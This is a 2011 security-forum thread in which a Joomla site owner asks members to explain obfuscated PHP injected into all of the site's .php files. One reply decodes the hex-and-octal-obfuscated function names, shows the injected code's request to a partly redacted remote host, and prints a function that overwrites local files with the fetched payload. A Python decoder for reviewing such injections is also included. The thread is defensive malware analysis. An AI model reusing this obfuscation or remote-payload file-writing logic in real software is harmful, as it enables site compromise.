
HACK CODE TO BE EXPLANED

<<

alexsp

Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Wed Jan 26, 2011 5:08 pm

HACK CODE TO BE EXPLANED

Hello there to the ethical hacker community. At the start of the attached file there is code that I found in all .php files that exist on a site that was hacked. If the code seems interesting to anyone, some explanation of what the code does would be very helpful so I can secure my site.
<<

cd1zz

Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Wed Jan 26, 2011 6:52 pm

Re: HACK CODE TO BE EXPLANED

This doesn't look malicious to me. Why do you think it is?
<<

alexsp

Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Thu Jan 27, 2011 2:37 am

Re: HACK CODE TO BE EXPLANED

First of all, thanks for the reply. I know this code is malicious because the site was hacked several times and many strange things happened, you know, like front page replacement by hackers and things like that. Secondly, because the site is built on Joomla and I can distinguish (as can everyone who has been working with Joomla) the code that exists on a normal Joomla .php page from code that was manually inserted. You can also notice this: the Joomla code starts with the Joomla credits comments (at line 2!!!).
Can you tell what the first part of the code (the one that is not well laid out and comes before the Joomla credits comments) is for? Also, as you can see, it uses code encoding and decoding. I don't know; I can also post a normal index.php to view the difference.
<<

alexsp

Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Thu Jan 27, 2011 2:43 am

Re: HACK CODE TO BE EXPLANED

I forgot to mention that this code has been placed in all .php pages of the site; that is not very common, don't you think? This is actually a professional real hack and I think it is very interesting to investigate how this was done...
<<

RoleReversal

Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Thu Jan 27, 2011 4:43 am

Re: HACK CODE TO BE EXPLANED

Alexsp,

I've no experience with Joomla, so apologies if this is overly generic. If you can post what the file should be, or just outline which code is added/modified, that will help.

However, whilst this may be a result of a compromise, I'd not expect the code you've found to be the first point of intrusion, as any attacker would already need a foothold on the server to be able to add/alter any of your existing source.

I'd strongly suggest a thorough review of server logs, access, user etc. (basically the usual candidates), as well as a security audit of the code hosted on the site.

Is this site the only web application running on the server, or is it shared? If shared, it could be that the fault doesn't exist within your application, but a weakness on a different site has allowed a malicious user system access to modify the source code of otherwise secure web apps.

Hope this helps.
<<

alexsp

Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Thu Jan 27, 2011 5:48 am

Re: HACK CODE TO BE EXPLANED

I am posting an original ("clean") index.php file of Joomla as it should normally be.
It is obvious that this part of the code shouldn't be there, but even if someone claims that this code is not malicious, it means that he or she understands what this code does. So please explain it to me too.
Andrew, I know that this is not the first point of intrusion, and I know also that Joomla has a lot of known vulnerabilities, but I see a piece of code in the files of a site and I am curious what it does and how.
<<

RoleReversal

Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Thu Jan 27, 2011 6:02 am

Re: HACK CODE TO BE EXPLANED

Again, not a Joomla expert so I'm going blind on some things, but:

'Edited' index file includes two additional php files (helper.php & toolbar.php). Are these a legitimate part of the framework? Are they also edited? Are they required? What do they do?

Looks like the edited file removes an authorisation call, suspicion levels rising...

Finally, the edited index file looks like it calls a function to get a gzipped copy of the configuration file.

From my knowledge of Joomla this could be legit (if you're seeing it across multiple systems, any chance you've just upgraded Joomla?). But at worst looks like a data leakage issue, I'd still suggest focusing on locating the original compromise, this looks to be more a symptom than a cause.

Can anyone shed any additional light?
<<

alexsp

Newbie

Posts: 5

Joined: Wed Jan 26, 2011 4:55 pm

Post Thu Jan 27, 2011 6:56 am

Re: HACK CODE TO BE EXPLANED

I agree that it is the symptom and not the cause. I would like to say again that this code has been inserted into all php pages, and the number of those is very large.
As for the files you mentioned Andrew helper.php and the other one, yes these files are very common to joomla.
So only someone that would understand what the code does per line could help right now.
I am not sure but the first big part looks like a shell to me. 
<<

RoleReversal

Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Thu Jan 27, 2011 7:26 am

Re: HACK CODE TO BE EXPLANED

alexsp wrote:I am not sure but the first big part looks like a shell to me. 


Which part? Unless I'm missing something, I can't see anything in the code you've uploaded that indicates a shell.
<<

hayabusa

Hero Member

Posts: 1661

Joined: Mon Jan 29, 2007 2:59 pm

Post Thu Jan 27, 2011 10:09 am

Re: HACK CODE TO BE EXPLANED

While, unfortunately, I don't have time to review code, today...

My inkling, first, would be to set up a LAN sniffer and a test workstation, open the php from the test workstation, trace it, and see what happens...
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

n1p

Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Thu Jan 27, 2011 10:53 am

Re: HACK CODE TO BE EXPLANED

Initial inspection - the initial arguments are set to globals for each function, which are extremely obfuscated:
  Code:
$x1e="\x63u\162\x6c\x5f\x69\156i\x74";                    //curl_init
$x1f="\143\165rl\137set\x6fp\x74";                        //curl_setopt
$x20="\x63\165r\154_\x65xe\x63";                          //curl_exec
$x23="\x66\143\154\x6f\163e";                             //fclose
$x24="f\x69l\145\x5fg\x65t\x5f\143on\164\145nt\x73";      //file_get_contents
$x25="\146\x6f\160\145\x6e";                              //fopen
$x26="f\x75n\x63\x74\x69\x6f\156\137\x65xi\163\x74\163";  //function_exists
$x27="\146\167\x72i\x74\145";                             //fwrite
$x28="\x68\145a\144\145\x72";                             //header
$x29="\x69\156\151_\147e\164";                            //ini_get
$x2a="\x69s_f\151\x6ce";                                  //is_file
$x2b="\x6d\1445";                                         //md5
$x2c="\160a\163s\x74h\162u";                              //passthru
$x2d="strpos";                                            //strpos (left unencoded)
$x2e="\x73t\162t\157l\157\167er";                         //strtolower
$x2f="\165rl\145n\x63od\x65";                             //urlencode


Also creates a file (in my instance on the local file system, in the Temp folder) and writes to that file after making the following request:

  Code:
"http://getpro<removed>number.com/i/rem.php?u=http://yourhost/index.php%3FDBGSESSID%3D405705822416000001%3Bd&k=054bb441428d289666e5cc9692c5420d&t=jm"


In this instance k is the filename for temp created file...

  Code:
// x0e($x10, $x12): overwrite the existing local file $x10 with the payload $x12
function x0e($x10,$x12){
   global $x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f;
   if ($x2a($x10)){          //if(is_file(local temp file))
   $x13=@$x25($x10,'w');     //fopen(file, 'w'): open it for writing, errors suppressed
   @$x27($x13,$x12);         //fwrite(handle, payload)
   @$x23($x13);              //fclose(handle)
   @$x28('Y_Out: b2s=');     //header('Y_Out: b2s='): adds a marker response header
   }
}


A lot of other code there I haven't had a chance to look at. That remote site appears down, but is actually a forbidden index page... Suspicious?

Given more time I could have a look, but that may help you get started... PM me if you want the real URL, as I didn't want possibly malicious URLs in the post....

Apologies if not too detailed, I could only look for 10 mins!

n1p
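The escapes in n1p's listing are ordinary PHP double-quoted string escapes (\xHH for hex, \NNN for octal), so the function names can be recovered mechanically rather than by hand. The following Python script is an added example for this thread, not code from the thread or from the injected file: it decodes those escapes, builds a variable-to-function map, rewrites the `$var(...)` calls as plain names so a reviewer can read what the inserted code does, and flags aliases that resolve to functions worth a closer look. SAMPLE_PHP is constructed from the assignments and the x0e function quoted above, not the poster's full file; the list of sensitive names is my own choice.

```python
import re

# Constructed sample: a subset of the obfuscated assignments and the x0e
# function quoted in the thread (not the complete uploaded file).
SAMPLE_PHP = r'''
$x1e="\x63u\162\x6c\x5f\x69\156i\x74";
$x1f="\143\165rl\137set\x6fp\x74";
$x20="\x63\165r\154_\x65xe\x63";
$x23="\x66\143\154\x6f\163e";
$x25="\146\x6f\160\145\x6e";
$x27="\146\167\x72i\x74\145";
$x28="\x68\145a\144\145\x72";
$x2a="\x69s_f\151\x6ce";
$x2c="\160a\163s\x74h\162u";
$x2d="strpos";
function x0e($x10,$x12){
   global $x23,$x25,$x27,$x28,$x2a;
   if ($x2a($x10)){
   $x13=@$x25($x10,'w');
   @$x27($x13,$x12);
   @$x23($x13);
   @$x28('Y_Out: b2s=');
   }
}
'''

# PHP double-quoted escapes: backslash-x followed by 1-2 hex digits,
# backslash followed by 1-3 octal digits (low byte kept), or one of the
# single-letter escapes n t r v e f, a backslash, a dollar sign or a quote.
_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[ntrvef\\$"])')
_SIMPLE = {'n': '\n', 't': '\t', 'r': '\r', 'v': '\v', 'e': '\x1b',
           'f': '\f', '\\': '\\', '$': '$', '"': '"'}


def decode_php_dq(body):
    """Decode the body of a PHP double-quoted string literal."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == 'x':
            return chr(int(tok[1:], 16))
        if tok[0] in '01234567':
            return chr(int(tok, 8) & 0xFF)   # PHP keeps only the low byte
        return _SIMPLE[tok]
    return _ESCAPE.sub(repl, body)


# $name = "…"; with any escaped characters inside the quotes.
_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')


def extract_aliases(src):
    """Map each variable assigned a double-quoted string to its decoded value."""
    return {name: decode_php_dq(body) for name, body in _ASSIGN.findall(src)}


_IDENT = re.compile(r'[A-Za-z_]\w*\Z')
_CALL = re.compile(r'\$(\w+)(?=\s*\()')   # $var immediately followed by '('


def resolve_calls(src, aliases):
    """Rewrite $var(...) as name(...) wherever $var holds a plain identifier."""
    def repl(m):
        name = aliases.get(m.group(1))
        if name is not None and _IDENT.match(name):
            return name
        return m.group(0)
    return _CALL.sub(repl, src)


# Functions a reviewer would want to see called by name in injected code;
# this list is an assumption for the example, not taken from the thread.
SENSITIVE = {'eval', 'passthru', 'system', 'exec', 'shell_exec',
             'curl_exec', 'fwrite', 'file_put_contents', 'header'}


def flag_sensitive(aliases):
    """Sorted list of decoded alias targets that appear in SENSITIVE."""
    return sorted({v for v in aliases.values() if v in SENSITIVE})


if __name__ == '__main__':
    aliases = extract_aliases(SAMPLE_PHP)
    for var, name in sorted(aliases.items()):
        print(f'${var} -> {name}')
    print('sensitive:', ', '.join(flag_sensitive(aliases)))
    print(resolve_calls(SAMPLE_PHP, aliases))
```

Run against the real file, the output of `resolve_calls` turns `if ($x2a($x10))` into `if (is_file($x10))` and `@$x27($x13,$x12)` into `@fwrite($x13,$x12)`, which is the same reading n1p gave by hand. The decoder only handles double-quoted literals; code that builds names with `chr()`, `base64_decode()` or string concatenation needs a further pass.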
<<

cd1zz

Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Jan 27, 2011 11:38 am

Re: HACK CODE TO BE EXPLANED

n1p

Which file did that come from?
<<

n1p

Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Thu Jan 27, 2011 12:13 pm

Re: HACK CODE TO BE EXPLANED

First one provided.. extracted the added code in main index.php and reformatted it..
<<

cd1zz

Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Jan 27, 2011 12:17 pm

Re: HACK CODE TO BE EXPLANED

I'm an idiot - I didn't have word wrap on. I'll take a look now.
<<

RoleReversal

Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Thu Jan 27, 2011 4:46 pm

Re: HACK CODE TO BE EXPLANED

cd1zz wrote:I'm an idiot - I didn't have word wrap on. I'll take a look now.

+1, I did the same, nothing like a rookie error on a public board :'(
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software